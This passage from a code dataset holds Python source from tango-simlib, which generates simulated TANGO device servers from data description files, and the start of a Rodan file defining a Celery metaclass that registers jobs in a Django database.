time\nimport weakref\nfrom builtins import map, object, range\nfrom functools import partial\n\nimport numpy as np\n\nfrom tango import (\n Attr,\n AttrDataFormat,\n AttrQuality,\n AttrWriteType,\n CmdArgType,\n DevState,\n UserDefaultAttrProp,\n)\nfrom tango.server import Device, attribute, device_property\nfrom tango_simlib.model import (\n Model,\n PopulateModelActions,\n PopulateModelProperties,\n PopulateModelQuantities,\n)\nfrom future.utils import with_metaclass\nfrom future.utils import itervalues\nfrom tango_simlib.sim_test_interface import TangoTestDeviceServerBase\nfrom tango_simlib.utilities import helper_module\nfrom tango_simlib.utilities.fandango_json_parser import FandangoExportDeviceParser\nfrom tango_simlib.utilities.sim_xmi_parser import XmiParser\nfrom tango_simlib.utilities.simdd_json_parser import SimddParser\n\nMODULE_LOGGER = logging.getLogger(__name__)\n\n\nclass TangoDeviceServerBase(Device):\n instances = weakref.WeakValueDictionary()\n\n def init_device(self):\n super(TangoDeviceServerBase, self).init_device()\n name = self.get_name()\n self.model = None\n self.instances[name] = self\n self.set_state(DevState.ON)\n\n def always_executed_hook(self):\n self.model.update()\n\n def read_attributes(self, attr):\n \"\"\"Method reading an attribute value.\n\n Parameters\n ----------\n attr : PyTango.DevAttr\n The attribute to read from.\n\n \"\"\"\n if self.get_state() != DevState.OFF:\n name = attr.get_name()\n value, update_time = self.model.quantity_state[name]\n quality = AttrQuality.ATTR_VALID\n attr.set_value_date_quality(value, update_time, quality)\n\n def write_attributes(self, attr):\n \"\"\"Method writing an attribute value.\n\n Parameters\n ----------\n attr : PyTango.DevAttr\n The attribute to write to.\n\n \"\"\"\n if self.get_state() != DevState.OFF:\n name = attr.get_name()\n data = attr.get_write_value()\n self.model.sim_quantities[name].set_val(data, self.model.time_func())\n\n\ndef add_static_attribute(tango_device_class, attr_name, attr_meta):\n \"\"\"Add any TANGO attribute of to the device server before start-up.\n\n Parameters\n ----------\n cls: class\n class object that the device server will inherit from\n attr_name: str\n Tango attribute name\n attr_meta: dict\n Meta data that enables the creation of a well configured attribute\n\n\n Note\n ====\n This is needed for DevEnum and spectrum type attributes\n\n \"\"\"\n polling_period = attr_meta[\"period\"]\n attr = attribute(\n label=attr_meta.get(\"label\", attr_name),\n 
dtype=attr_meta[\"data_type\"],\n enum_labels=attr_meta.get(\"enum_labels\", []),\n doc=attr_meta.get(\"description\", \"\"),\n dformat=attr_meta[\"data_format\"],\n max_dim_x=int(attr_meta[\"max_dim_x\"]),\n max_dim_y=int(attr_meta[\"max_dim_y\"]),\n access=getattr(AttrWriteType, attr_meta[\"writable\"], AttrWriteType.READ),\n polling_period=int(polling_period) if polling_period else -1,\n min_value=attr_meta.get(\"min_value\", \"\"),\n max_value=attr_meta.get(\"max_value\", \"\"),\n min_alarm=attr_meta.get(\"min_alarm\", \"\"),\n max_alarm=attr_meta.get(\"max_alarm\", \"\"),\n min_warning=attr_meta.get(\"min_warning\", \"\"),\n max_warning=attr_meta.get(\"max_warning\", \"\"),\n delta_val=attr_meta.get(\"delta_val\", \"\"),\n delta_t=attr_meta.get(\"delta_t\", \"\"),\n abs_change=attr_meta.get(\"abs_change\", \"\"),\n rel_change=attr_meta.get(\"rel_change\", \"\"),\n event_period=attr_meta.get(\"event_period\", \"\"),\n archive_abs_change=attr_meta.get(\"archive_abs_change\", \"\"),\n archive_rel_change=attr_meta.get(\"archive_rel_change\", \"\"),\n archive_period=attr_meta.get(\"archive_period\", \"\"),\n )\n attr.__name__ = attr_name\n\n # Attribute read method\n def read_meth(tango_device_instance, attr):\n name = attr.get_name()\n value, update_time = tango_device_instance.model.quantity_state[name]\n quality = AttrQuality.ATTR_VALID\n # For attributes that have a SPECTRUM data format, there is no need to\n # type cast them to an integer data type. we need assign the list of values\n # to the attribute value parameter.\n if type(value) in (list, np.ndarray):\n attr.set_value_date_quality(value, update_time, quality)\n else:\n attr.set_value_date_quality(int(value), update_time, quality)\n\n # Attribute write method for writable attributes\n if str(attr_meta[\"writable\"]) in (\"READ_WRITE\", \"WRITE\"):\n\n @attr.write\n def attr(tango_device_instance, new_val):\n # When selecting a model quantity we use the enum labels list indexing\n # to return the string value corresponding to the respective enum value\n # since an integer value is returned by device server when\n # attribute value is read\n _sim_quantities = tango_device_instance.model.sim_quantities\n tango_device_instance.model_quantity = _sim_quantities[attr_name]\n tango_device_instance.model_quantity.set_val(\n new_val, tango_device_instance.model.time_func()\n )\n\n read_meth.__name__ = \"read_{}\".format(attr_name)\n # Add the read method and the attribute to the class object\n setattr(tango_device_class, read_meth.__name__, read_meth)\n setattr(tango_device_class, attr.__name__, attr)\n\n\ndef _create_sim_test_interface_atttribute(models, class_instance):\n # Pick the first model instance in the dict.\n controllable_attribute_names = list(itervalues(models))[0].sim_quantities.keys()\n attr_control_meta = {}\n attr_control_meta[\"enum_labels\"] = sorted(controllable_attribute_names)\n attr_control_meta[\"data_format\"] = AttrDataFormat.SCALAR\n attr_control_meta[\"data_type\"] = CmdArgType.DevEnum\n attr_control_meta[\"label\"] = \"Attribute name\"\n attr_control_meta[\"description\"] = \"Attribute name to control\"\n attr_control_meta[\"max_dim_x\"] = 1\n attr_control_meta[\"max_dim_y\"] = 0\n attr_control_meta[\"writable\"] = \"READ_WRITE\"\n\n enum_labels = attr_control_meta.get(\"enum_labels\", \"\")\n attr = attribute(\n label=attr_control_meta[\"label\"],\n dtype=attr_control_meta[\"data_type\"],\n enum_labels=enum_labels,\n doc=attr_control_meta[\"description\"],\n dformat=attr_control_meta[\"data_format\"],\n 
max_dim_x=attr_control_meta[\"max_dim_x\"],\n        max_dim_y=attr_control_meta[\"max_dim_y\"],\n        access=getattr(AttrWriteType, attr_control_meta[\"writable\"]),\n        fget=class_instance.read_fn,\n        fset=class_instance.write_fn,\n    )\n\n    return attr\n\n\ndef get_tango_device_server(models, sim_data_files):\n    \"\"\"Declares a tango device class that inherits the Device class and then\n    adds tango attributes (DevEnum and Spectrum type).\n\n    Parameters\n    ----------\n    models: dict\n        A dictionary of model.Model instances.\n        e.g. {'model-name': model.Model}\n    sim_data_files: list\n        A list of direct paths to either xmi/fgo/json data files.\n\n    Returns\n    -------\n    TangoDeviceServer : PyTango.Device\n        Tango device that has the commands dictionary populated.\n\n    \"\"\"\n    # Declare a Tango Device class for specifically adding static\n    # attributes prior running the device server and controller\n    class TangoDeviceServerStaticAttrs(object):\n        pass\n\n    class TangoTestDeviceServerStaticAttrs(object):\n        pass\n\n    def read_fn(tango_device_instance):\n        return tango_device_instance._attribute_name_index\n\n    def write_fn(tango_device_instance, val):\n        tango_device_instance._attribute_name_index = val\n        tango_device_instance.model_quantity = tango_device_instance.model.sim_quantities[\n            sorted(tango_device_instance.model.sim_quantities.keys())[val]\n        ]\n\n    # Sim test interface static attribute `attribute_name` info\n    TangoTestDeviceServerStaticAttrs.read_fn = read_fn\n    TangoTestDeviceServerStaticAttrs.write_fn = write_fn\n    attr = _create_sim_test_interface_atttribute(models, TangoTestDeviceServerStaticAttrs)\n    attr.setter(TangoTestDeviceServerStaticAttrs.write_fn)\n    TangoTestDeviceServerStaticAttrs.attribute_name = attr\n    # We use the `add_static_attribute` method to add DevEnum and Spectrum type\n    # attributes statically to the tango device before start-up since they\n    # cannot be well configured when added dynamically. This is suspected\n    # to be a bug.\n    # TODO(AR 02-03-2017): Ask the tango community on the upcoming Stack\n    # Exchange community (AskTango) and also make follow ups on the next tango\n    # releases.\n    static_attributes_added = []\n    for quantity_name, quantity in list(itervalues(models))[0].sim_quantities.items():\n        d_type = str(quantity.meta[\"data_type\"])\n        d_format = str(quantity.meta[\"data_format\"])\n        if d_type == \"DevEnum\" or d_format in (\"SPECTRUM\", \"IMAGE\"):\n            add_static_attribute(\n                TangoDeviceServerStaticAttrs, quantity_name, quantity.meta\n            )\n            static_attributes_added.append(quantity_name)\n\n    MODULE_LOGGER.info(\n        \"Static attributes added to the device: [{}]\".format(static_attributes_added)\n    )\n\n    class TangoDeviceServer(TangoDeviceServerBase, TangoDeviceServerStaticAttrs):\n        _models = models\n\n        min_update_period = device_property(\n            dtype=float,\n            default_value=0.99,\n            doc=\"Minimum time before model update method can be called again [seconds].\",\n        )\n\n        def init_device(self):\n            super(TangoDeviceServer, self).init_device()\n            self.model = self._models[self.get_name()]\n            self._not_added_attributes = []\n            write_device_properties_to_db(self.get_name(), self.model)\n            self.model.reset_model_state()\n            self.model.min_update_period = self.min_update_period\n            self.initialize_dynamic_commands()\n\n            # Only the .fgo file has the State as an attribute. The .xmi files have\n            # it as a command, so it won't have an initial value. And in some other\n            # data description files the State attribute is not specified.
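\n            # A hedged illustration (assumed meta shape, not quoted from any\n            # parser): the 'State' quantity meta is expected to carry the numeric\n            # enum value as a string, e.g.\n            #     {'name': 'State', 'value': '0', 'writable': 'READ', ...}\n            # so int(meta['value']) below indexes PyTango's DevState.values,\n            # where DevState.values[0] is DevState.ON.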
\n            if \"State\" in self.model.sim_quantities:\n                # Set default device state\n                state_quantity = self.model.sim_quantities[\"State\"].meta\n                state_value = int(state_quantity[\"value\"])\n                self.set_state(DevState.values[state_value])\n\n        def initialize_dynamic_commands(self):\n            commands_added = []\n            for action_name, action_handler in self.model.sim_actions.items():\n                cmd_handler = helper_module.generate_cmd_handler(\n                    self.model, action_name, action_handler\n                )\n                setattr(TangoDeviceServer, action_name, cmd_handler)\n                self.add_command(cmd_handler, device_level=True)\n                commands_added.append(action_name)\n\n            MODULE_LOGGER.info(\n                \"Dynamic commands added to the device: [{}]\".format(commands_added)\n            )\n\n        def initialize_dynamic_attributes(self):\n            model_sim_quants = self.model.sim_quantities\n            attribute_list = set([attr for attr in model_sim_quants.keys()])\n            attributes_added = []\n            for attribute_name in attribute_list:\n                meta_data = model_sim_quants[attribute_name].meta\n                # Dynamically add all attributes except those with DevEnum data type,\n                # and SPECTRUM data format since they are added statically to the device\n                # class prior to start-up. Also exclude attributes with a data format\n                # 'IMAGE' as we currently do not handle them.\n                if not self._is_attribute_addable_dynamically(meta_data):\n                    continue\n                # The return value of rwType is a string and it is required as a\n                # PyTango data type when passed to the Attr function.\n                # e.g. 'READ' -> tango._tango.AttrWriteType.READ\n                rw_type = meta_data[\"writable\"]\n                rw_type = getattr(AttrWriteType, rw_type)\n                attr = self._create_attribute(\n                    attribute_name, meta_data[\"data_type\"], rw_type\n                )\n                if attr is None:\n                    continue\n\n                self._configure_attribute_default_properties(attr, meta_data)\n                self._add_dynamic_attribute(attr, rw_type)\n                attributes_added.append(attribute_name)\n\n            MODULE_LOGGER.info(\n                \"Dynamic attributes added to the device: [{}]\".format(attributes_added)\n            )\n\n        def _add_dynamic_attribute(self, attribute, read_write_type):\n            if read_write_type in (AttrWriteType.READ, AttrWriteType.READ_WITH_WRITE):\n                self.add_attribute(attribute, r_meth=self.read_attributes)\n            elif read_write_type == AttrWriteType.WRITE:\n                self.add_attribute(attribute, w_meth=self.write_attributes)\n            elif read_write_type == AttrWriteType.READ_WRITE:\n                self.add_attribute(\n                    attribute, r_meth=self.read_attributes, w_meth=self.write_attributes\n                )\n\n        def _is_attribute_addable_dynamically(self, quantity_meta_data):\n            attr_dtype = quantity_meta_data[\"data_type\"]\n            d_format = quantity_meta_data[\"data_format\"]\n            if str(attr_dtype) == \"DevEnum\" or str(d_format) in (\"SPECTRUM\", \"IMAGE\"):\n                return False\n\n            return True\n\n        def _create_attribute(self, attribute_name, attr_dtype, rw_type):\n            attribute = None\n            # Add a try/except clause when creating an instance of Attr class\n            # as PyTango may raise an error when things go wrong.\n            try:\n                attribute = Attr(attribute_name, attr_dtype, rw_type)\n            except Exception as e:\n                self._not_added_attributes.append(attribute_name)\n                MODULE_LOGGER.error(\n                    \"Attribute %s could not be added dynamically\"\n                    \" due to an error raised %s.\",\n                    attribute_name,\n                    str(e),\n                )\n\n            return attribute\n\n        def _configure_attribute_default_properties(self, attribute, quantity_meta_data):\n            attribute_properties = UserDefaultAttrProp()\n            for prop, prop_value in quantity_meta_data.items():\n                # NB: Calling 'set_enum_labels' or setting the 'enum_labels' results\n                # in an error, and we do not need to anyway, as 
DevEnum attributes are\n # handled by the `add_static_attribute` method.\n if prop == \"enum_labels\":\n continue\n\n # UserDefaultAttrProp does not have the property 'event_period' but does\n # have a setter method for it.\n if prop == \"event_period\":\n attribute_properties.set_event_period(prop_value)\n continue\n\n attribute_name = quantity_meta_data[\"name\"]\n if hasattr(attribute_properties, prop):\n try:\n setattr(attribute_properties, prop, prop_value)\n except Exception as e:\n MODULE_LOGGER.error(\n \"The attribute '%s's property '%s' could not be set to \"\n \"value '%s' due to an error raised %s.\",\n attribute_name,\n prop,\n prop_value,\n str(e),\n )\n else:\n MODULE_LOGGER.debug(\n \"UserDefaultAttrProp has no attribute named '%s' \"\n \"for the device attribute '%s'.\",\n prop,\n attribute_name,\n )\n\n attribute.set_default_properties(attribute_properties)\n\n @attribute(\n dtype=(str,),\n doc=\"List of attributes that were not added to the \"\n \"device due to an error.\",\n max_dim_x=10000,\n )\n def AttributesNotAdded(self):\n return self._not_added_attributes\n\n @attribute(\n dtype=int,\n doc=\"Number of attributes not added to the device due to an error.\",\n )\n def NumAttributesNotAdded(self):\n return len(self._not_added_attributes)\n\n class SimControl(TangoTestDeviceServerBase, TangoTestDeviceServerStaticAttrs):\n instances = weakref.WeakValueDictionary()\n\n def init_device(self):\n super(SimControl, self).init_device()\n\n name = self.get_name()\n self.instances[name] = self\n\n klass_name = get_device_class(sim_data_files)\n TangoDeviceServer.TangoClassName = klass_name\n TangoDeviceServer.__name__ = klass_name\n SimControl.TangoClassName = \"%sSimControl\" % klass_name\n SimControl.__name__ = \"%sSimControl\" % klass_name\n return [TangoDeviceServer, SimControl]\n\n\ndef write_device_properties_to_db(device_name, model, db_instance=None):\n \"\"\"Writes device properties, including optional default value, to tango DB.\n\n Parameters\n ----------\n device_name : str\n A TANGO device name\n model : model.Model instance\n Device model instance\n db_instance : tango._tango.Database instance\n Tango database instance\n \"\"\"\n if not db_instance:\n db_instance = helper_module.get_database()\n\n for prop_name, prop_meta in model.sim_properties.items():\n db_instance.put_device_property(\n device_name, {prop_name: prop_meta[\"DefaultPropValue\"]}\n )\n\n\ndef get_parser_instance(sim_datafile):\n \"\"\"This method returns an appropriate parser instance to generate a Tango device.\n\n Parameters\n ----------\n sim_datafile : str\n A direct path to the xmi/json/fgo file.\n\n Returns\n ------\n parser_instance: Parser instance\n The Parser object which reads an xmi/json/fgo file and parses it into device\n attributes, commands, and properties.\n\n \"\"\"\n extension = os.path.splitext(sim_datafile)[-1]\n extension = extension.lower()\n parser_instance = None\n if extension in [\".xmi\"]:\n parser_instance = XmiParser()\n parser_instance.parse(sim_datafile)\n elif extension in [\".json\"]:\n parser_instance = SimddParser()\n parser_instance.parse(sim_datafile)\n elif extension in [\".fgo\"]:\n parser_instance = FandangoExportDeviceParser()\n parser_instance.parse(sim_datafile)\n return parser_instance\n\n\ndef configure_device_model(sim_data_file=None, test_device_name=None, logger=None):\n models = configure_device_models(sim_data_file, test_device_name, logger)\n if len(models) == 1:\n return models\n else:\n raise RuntimeError(\n \"Single model expected, but found 
{} devices\"\n \" registered under device server class {}. Rather use\"\n \" `configure_device_models`.\".format(\n len(models), get_device_class(sim_data_file)\n )\n )\n\n\ndef configure_device_models(sim_data_file=None, test_device_name=None, logger=None):\n \"\"\"\n In essence this function should get the data descriptor file, parse it,\n take the attribute and command information, populate the model(s) quantities and\n actions to be simulated and return that model.\n\n Parameters\n ----------\n sim_datafile : list\n A list of direct paths to either xmi/json/fgo files.\n test_device_name : str\n A TANGO device name. This is used for running tests as we want the model\n instance and the device name to have the same name.\n\n Returns\n -------\n models : dict\n A dictionary of model.Model instances\n\n \"\"\"\n data_file = sim_data_file\n klass_name = get_device_class(data_file)\n dev_names = None\n if test_device_name is None:\n server_name = helper_module.get_server_name()\n db_instance = helper_module.get_database()\n # db_datum is a PyTango.DbDatum structure with attribute name and value_string.\n # The name attribute represents the name of the device server and the\n # value_string attribute is a list of all the registered device instances in\n # that device server instance for the TANGO class 'TangoDeviceServer'.\n db_datum = db_instance.get_device_name(server_name, klass_name)\n # We assume that at least one device instance has been\n # registered for that class and device server.\n dev_names = getattr(db_datum, \"value_string\")\n if not dev_names:\n dev_name = \"test/nodb/tangodeviceserver\"\n else:\n dev_name = test_device_name\n\n # In case there are more than one data description files to be used to configure the\n # device.\n parsers = []\n for file_name in data_file:\n parsers.append(get_parser_instance(file_name))\n\n # In case there is more than one device instance per class.\n models = {}\n if dev_names:\n for dev_name in dev_names:\n models[dev_name] = Model(dev_name, logger=logger)\n else:\n models[dev_name] = Model(dev_name, logger=logger)\n\n # In case there is more than one parser instance for each file\n for model in models.values():\n command_info = {}\n properties_info = {}\n override_info = {}\n for parser in parsers:\n PopulateModelQuantities(parser, model.name, model)\n command_info.update(parser.get_device_command_metadata())\n properties_info.update(\n parser.get_device_properties_metadata(\"deviceProperties\")\n )\n override_info.update(parser.get_device_cmd_override_metadata())\n PopulateModelActions(command_info, override_info, model.name, model)\n PopulateModelProperties(properties_info, model.name, model)\n return models\n\n\ndef generate_device_server(server_name, sim_data_files, directory=\"\"):\n \"\"\"Create a tango device server python file.\n\n Parameters\n ----------\n server_name: str\n Tango device server name\n sim_data_files: list\n A list of direct paths to either xmi/fgo/json data files.\n\n \"\"\"\n lines = [\n \"#!/usr/bin/env python\",\n \"from tango.server import server_run\",\n (\n \"from tango_simlib.tango_sim_generator import (\"\n \"configure_device_models, get_tango_device_server)\"\n ),\n \"\\n\\n# File generated on {} by tango-simlib-generator\".format(time.ctime()),\n \"\\n\\ndef main():\",\n \" sim_data_files = {}\".format(sim_data_files),\n \" models = configure_device_models(sim_data_files)\",\n \" TangoDeviceServers = get_tango_device_server(models, sim_data_files)\",\n \" server_run(TangoDeviceServers)\",\n '\\nif __name__ 
== \"__main__\":',\n \" main()\\n\",\n ]\n with open(os.path.join(directory, \"%s\" % server_name), \"w\") as dserver:\n dserver.write(\"\\n\".join(lines))\n # Make the script executable\n os.chmod(os.path.join(directory, \"%s\" % server_name), 477)\n\n\ndef get_device_class(sim_data_files):\n \"\"\"Get device class name from specified xmi/simdd description file.\n\n Parameters\n ----------\n sim_data_files: list\n A list of direct paths to either xmi/json/fgo data files.\n\n Returns\n -------\n klass_name: str\n Tango device class name\n\n \"\"\"\n if len(sim_data_files) < 1:\n raise Exception(\"No simulator data file specified.\")\n\n parser_instance = None\n klass_name = \"\"\n precedence_map = {\".xmi\": 1, \".fgo\": 2, \".json\": 3}\n\n def get_precedence(file_name):\n extension = os.path.splitext(file_name)[-1]\n extension = extension.lower()\n return precedence_map.get(extension, 100)\n\n sorted_files = sorted(sim_data_files, key=get_precedence)\n parser_instance = get_parser_instance(sorted_files[0])\n\n # Since at the current moment the class name of the tango simulator to be\n # generated must be specified in the xmi data file, if no xmi if provided\n # the simulator will be given a default name.\n if parser_instance:\n klass_name = parser_instance.device_class_name\n else:\n klass_name = \"TangoDeviceServer\"\n\n return klass_name\n\n\ndef get_argparser():\n parser = argparse.ArgumentParser(\n description=\"Generate a tango data driven simulator, handling\"\n \" registration as needed. Supports multiple device per process.\"\n )\n required_argument = partial(parser.add_argument, required=True)\n required_argument(\n \"--sim-data-file\",\n action=\"append\",\n help=\"Simulator description data files(s) \" \".i.e. can specify multiple files\",\n )\n required_argument(\"--directory\", help=\"TANGO server executable path\", default=\"\")\n required_argument(\"--dserver-name\", help=\"TANGO server executable command\")\n return parser\n\n\ndef main():\n arg_parser = get_argparser()\n opts = arg_parser.parse_args()\n generate_device_server(\n opts.dserver_name, opts.sim_data_file, directory=opts.directory\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ska-sa/tango-simlib","sub_path":"tango_simlib/tango_sim_generator.py","file_name":"tango_sim_generator.py","file_ext":"py","file_size_in_byte":25617,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"37348445659","text":"import contextlib\nimport copy\nimport inspect\n\n# import json\nimport jsonschema\nimport tempfile\nimport os\n\n# import re\nimport shutil\nimport sys\nimport time\nimport uuid\n\nfrom celery import Task, registry\nfrom celery.app.task import TaskType\nfrom django.conf import settings as rodan_settings\nfrom django.core.files import File\nfrom django.db import transaction\nfrom django.template import Template\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom rest_framework import status\n\nfrom rodan.constants import task_status\nfrom rodan.exceptions import CustomAPIException\nfrom rodan.models import (\n RunJob,\n Input,\n Output,\n Resource,\n ResourceType,\n Job,\n InputPortType,\n OutputPortType,\n WorkflowRun,\n)\nfrom rodan.jobs.deep_eq import deep_eq\nfrom rodan.jobs.convert_to_str import convert_to_str\n\nimport logging\n\nlogger = logging.getLogger(\"rodan\")\n\nif sys.version_info.major == 2:\n input = raw_input # noqa\n\n\nclass RodanTaskType(TaskType):\n \"\"\"\n This is the metaclass 
\n\n    Every time a new task inherits RodanTask, __init__ method of this metaclass is\n    triggered, which registers the new task in Rodan database.\n\n    Note: TaskType is the metaclass of Task (Celery objects)\n    \"\"\"\n\n    def __new__(cls, clsname, bases, attrs):\n        attrs[\"_abstract\"] = attrs.get(\n            \"abstract\"\n        )  # Keep a copy as Celery TaskType will delete it.\n\n        if not attrs[\"_abstract\"]:\n            module_name = attrs[\"__module__\"]\n            if module_name.startswith(\"rodan.jobs.\"):\n                attrs[\"_package_name\"] = (\n                    \"rodan.jobs.\" + module_name[len(\"rodan.jobs.\"):].split(\".\", 1)[0]\n                )\n            else:\n                if settings.TEST and module_name == \"rodan.test.dummy_jobs\":\n                    attrs[\"_package_name\"] = \"rodan.test.dummy_jobs\"\n                else:\n                    raise ValueError(\n                        (\n                            \"Invalid use of Rodan jobs - job package must\"\n                            \" be located in /rodan/jobs/\"\n                        )\n                    )\n\n        return TaskType.__new__(cls, clsname, bases, attrs)\n\n    def __init__(cls, clsname, bases, attrs):\n        super(RodanTaskType, cls).__init__(clsname, bases, attrs)\n\n        # check the number of arguments of implemented function\n        if \"run_my_task\" in attrs:\n            argspec = inspect.getargspec(attrs[\"run_my_task\"])\n            assert len(argspec.args) == 4, \"run_my_task\"\n        if \"get_my_interface\" in attrs:\n            argspec = inspect.getargspec(attrs[\"get_my_interface\"])\n            assert len(argspec.args) == 3, \"get_my_interface\"\n        if \"validate_my_user_input\" in attrs:\n            argspec = inspect.getargspec(attrs[\"validate_my_user_input\"])\n            assert len(argspec.args) == 4, \"validate_my_user_input\"\n        if \"test_my_task\" in attrs:\n            argspec = inspect.getargspec(attrs[\"test_my_task\"])\n            assert len(argspec.args) == 2, \"test_my_task\"\n\n        # not the abstract class\n        if attrs.get(\"_abstract\") is True:\n            return\n        else:\n\n            # Set base settings schema if they do not already exist in the job.\n            schema = attrs.get(\"settings\", {\"job_queue\": \"celery\", \"type\": \"object\"})\n\n            if not Job.objects.filter(name=attrs[\"name\"]).exists():\n                if (not getattr(settings, \"_update_rodan_jobs\", None) and not settings.TEST):\n                    raise ImproperlyConfigured(\n                        (\n                            \"The catalogue of local jobs does not match the ones in \"\n                            \"database: local job `{0}` has not been registered. 
Please\"\n \" run `manage.py migrate` on Rodan server to update the database.\"\n ).format(attrs[\"name\"])\n )\n\n try:\n # verify the schema\n jsonschema.Draft4Validator.check_schema(attrs[\"settings\"])\n except jsonschema.exceptions.SchemaError as e:\n raise e\n\n j = Job(\n name=attrs[\"name\"],\n author=attrs[\"author\"],\n description=attrs[\"description\"],\n settings=schema,\n enabled=attrs[\"enabled\"],\n category=attrs[\"category\"],\n interactive=attrs[\"interactive\"],\n # Check for the presence of job_queue in the rodan job's settings, if\n # not use the default 'celery'\n job_queue=schema.get(\"job_queue\", \"celery\"),\n )\n j.save()\n #print(attrs[\"name\"])\n\n try:\n for ipt in attrs[\"input_port_types\"]:\n i = InputPortType(\n job=j,\n name=ipt[\"name\"],\n minimum=ipt[\"minimum\"],\n maximum=ipt[\"maximum\"],\n is_list=ipt.get(\"is_list\", False),\n )\n i.save()\n resource_types = RodanTaskType._resolve_resource_types(\n ipt[\"resource_types\"]\n )\n if len(resource_types) == 0:\n raise ValueError(\n (\n \"No available resource types found for \"\n \"this InputPortType: {0}\"\n ).format(ipt[\"resource_types\"])\n )\n i.resource_types.add(*resource_types)\n for opt in attrs[\"output_port_types\"]:\n o = OutputPortType(\n job=j,\n name=opt[\"name\"],\n minimum=opt[\"minimum\"],\n maximum=opt[\"maximum\"],\n is_list=opt.get(\"is_list\", False),\n )\n o.save()\n resource_types = RodanTaskType._resolve_resource_types(\n opt[\"resource_types\"]\n )\n if len(resource_types) == 0:\n raise ValueError(\n (\n \"No available resource types found for this\"\n \" OutputPortType: {0}\"\n ).format(opt[\"resource_types\"])\n )\n o.resource_types.add(*resource_types)\n except Exception as e:\n j.delete() # clean the job\n raise e\n\n if not settings.TEST:\n print(\"Added: {0}\".format(j.name))\n else:\n UPDATE_JOBS = getattr(rodan_settings, \"_update_rodan_jobs\", False)\n # perform an integrity check, and update jobs if demanded.\n j = Job.objects.get(name=attrs[\"name\"])\n\n def check_field(\n field_name,\n original_value,\n new_value,\n compare_fn=lambda x, y: x == y,\n ):\n if not compare_fn(original_value, new_value):\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The field `{0}` of Job `{1}` seems to be updated: {2} --> {3}.\"\n \" Try to run `manage.py migrate` to confirm this update.\"\n ).format(\n field_name,\n j.name,\n convert_to_str(original_value),\n convert_to_str(new_value),\n )\n ) # noqa\n else:\n confirm_update = confirm(\n (\n \"The field `{0}` of Job `{1}` seems to be updated: \\n{2}\\n \"\n \"-->\\n{3}\\n\\nConfirm (y/N)? 
\"\n ).format(\n field_name,\n j.name,\n convert_to_str(original_value),\n convert_to_str(new_value),\n )\n ) # noqa\n if confirm_update:\n setattr(j, field_name, new_value)\n j.save()\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n check_field(\"author\", j.author, attrs[\"author\"])\n check_field(\"description\", j.description, attrs[\"description\"])\n check_field(\n \"settings\",\n j.settings,\n schema,\n compare_fn=lambda x, y: deep_eq(x, y),\n )\n check_field(\"enabled\", j.enabled, attrs[\"enabled\"])\n check_field(\"category\", j.category, attrs[\"category\"])\n check_field(\"interactive\", j.interactive, attrs[\"interactive\"])\n check_field(\"job_queue\", j.job_queue, schema.get(\"job_queue\", \"celery\"))\n\n # Input Port Types\n def check_port_types(which):\n \"which == 'in' or 'out'\"\n if which == \"in\":\n attrs_pts = list(copy.deepcopy(attrs[\"input_port_types\"]))\n db_pts = list(j.input_port_types.all())\n msg = \"Input\"\n elif which == \"out\":\n attrs_pts = list(copy.deepcopy(attrs[\"output_port_types\"]))\n db_pts = list(j.output_port_types.all())\n msg = \"Output\"\n\n for pt in db_pts:\n pt_name = pt.name\n\n idx = next(\n (\n i\n for (i, this_pt) in enumerate(attrs_pts)\n if (this_pt[\"name\"] == pt_name)\n ),\n None,\n )\n if (\n idx is not None\n ): # pt exists in database and in code. Check values\n attrs_pt = attrs_pts[idx]\n\n # Compare values\n if attrs_pt[\"minimum\"] != pt.minimum:\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job \"\n \"`{2}` seems to be updated: {3} --> {4}. Try to\"\n \" run `manage.py migrate` to confirm this update.\"\n ).format(\n \"minimum\",\n pt_name,\n j.name,\n pt.minimum,\n attrs_pt[\"minimum\"],\n msg,\n )\n )\n else:\n confirm_update = confirm(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: \\n{3}\\n -->\\n{4}\\n\\nConfirm \"\n \"(y/N)? \"\n ).format(\n \"minimum\",\n pt_name,\n j.name,\n pt.minimum,\n attrs_pt[\"minimum\"],\n msg,\n )\n )\n if confirm_update:\n pt.minimum = attrs_pt[\"minimum\"]\n pt.save()\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n if attrs_pt[\"maximum\"] != pt.maximum:\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: {3} --> {4}. Try to run \"\n \"`manage.py migrate` to confirm this update.\"\n ).format(\n \"maximum\",\n pt_name,\n j.name,\n pt.maximum,\n attrs_pt[\"maximum\"],\n msg,\n )\n )\n else:\n confirm_update = confirm(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: \\n{3}\\n -->\\n{4}\\n\\nConfirm \"\n \"(y/N)? \"\n ).format(\n \"maximum\",\n pt_name,\n j.name,\n pt.maximum,\n attrs_pt[\"maximum\"],\n msg,\n )\n )\n if confirm_update:\n pt.maximum = attrs_pt[\"maximum\"]\n pt.save()\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n attrs_is_list = bool(attrs_pt.get(\"is_list\", False))\n if attrs_is_list != pt.is_list:\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: {3} --> {4}. 
